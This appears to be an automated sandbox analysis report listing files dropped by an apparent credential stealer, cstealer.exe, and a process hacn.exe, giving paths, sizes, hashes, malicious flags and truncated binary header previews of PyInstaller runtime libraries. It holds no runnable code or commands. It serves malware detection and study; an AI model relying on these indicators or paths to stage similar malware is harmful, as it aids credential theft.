                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\sqlite3.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98224
                                                                                                                                                          Entropy (8bit):6.452201564717313
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                          MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                          SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                          SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                          SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83736
                                                                                                                                                          Entropy (8bit):6.595094797707322
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                                                                                          MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                                                                                          SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                                                                                          SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                                                                                          SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):254744
                                                                                                                                                          Entropy (8bit):6.564308911485739
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                                                                                                          MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                                                                                                          SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                                                                                                          SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                                                                                                          SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64792
                                                                                                                                                          Entropy (8bit):6.223467179037751
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                                                                                                          MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                                                                                                          SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                                                                                                          SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                                                                                                          SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158488
                                                                                                                                                          Entropy (8bit):6.8491143497239655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                                                                                          MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                                                                                          SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                                                                                          SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                                                                                          SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):79128
                                                                                                                                                          Entropy (8bit):6.284790077237953
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                                                                                                          MD5:819166054FEC07EFCD1062F13C2147EE
                                                                                                                                                          SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
                                                                                                                                                          SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
                                                                                                                                                          SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):880569
                                                                                                                                                          Entropy (8bit):5.682988287908638
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMNE:lgYJiVBFLa2VIVwx/fpEWe+MNE
                                                                                                                                                          MD5:483D9675EF53A13327E7DFC7D09F23FE
                                                                                                                                                          SHA1:2378F1DB6292CD8DC4AD95763A42AD49AEB11337
                                                                                                                                                          SHA-256:70C28EC0770EDEFCEF46FA27AAA08BA8DC22A31ACD6F84CB0B99257DCA1B629E
                                                                                                                                                          SHA-512:F905EB1817D7D4CC1F65E3A5A01BADE761BCA15C4A24AF7097BC8F3F2B43B00E000D6EA23CD054C391D3FDC2F1114F2AF43C8BB6D97C1A0CE747763260A864F5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3450648
                                                                                                                                                          Entropy (8bit):6.098075450035195
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
                                                                                                                                                          MD5:9D7A0C99256C50AFD5B0560BA2548930
                                                                                                                                                          SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
                                                                                                                                                          SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
                                                                                                                                                          SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\python310.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4458776
                                                                                                                                                          Entropy (8bit):6.460390021076921
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                                                                                                          MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                                                                                                          SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                                                                                                          SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                                                                                                          SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19846974
                                                                                                                                                          Entropy (8bit):7.998622680328521
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:393216:R+4ZXxd1jEfniX1H4Ei8oTwLpKwjQ6qcx+5jmJZ4uqBVTkLDs6:RRfjEfnilH49HM9jQ6qpXHEQ6
                                                                                                                                                          MD5:8198AD352AB70C2C974AB5C716956CD7
                                                                                                                                                          SHA1:AC9AF7C21EA6F1181F1B4EE9599C78DDA98DED4F
                                                                                                                                                          SHA-256:1AD182A75CA930D93521CBF94A5A41BBAAF661586FCCD4F660FF2E6BE4AA208F
                                                                                                                                                          SHA-512:E9DEDB10C55127F6846C3D0F59ECE37EF349FFC23EAFB74713207DCF86F223E47D34BDF7E8F34527CC262A43A8CCFC2FA7F5A4DE1D0D327B7F082495B131879E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29976
                                                                                                                                                          Entropy (8bit):6.627859470728624
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                                                                                                          MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                                                                                                          SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                                                                                                          SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                                                                                                          SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI47682\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1123608
                                                                                                                                                          Entropy (8bit):5.3853088605790385
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                                                                                                          MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                                                                                                          SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                                                                                                          SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                                                                                                          SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83328
                                                                                                                                                          Entropy (8bit):6.532254531979707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                          MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                          SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
                                                                                                                                                          SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                          SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                          Malicious:true
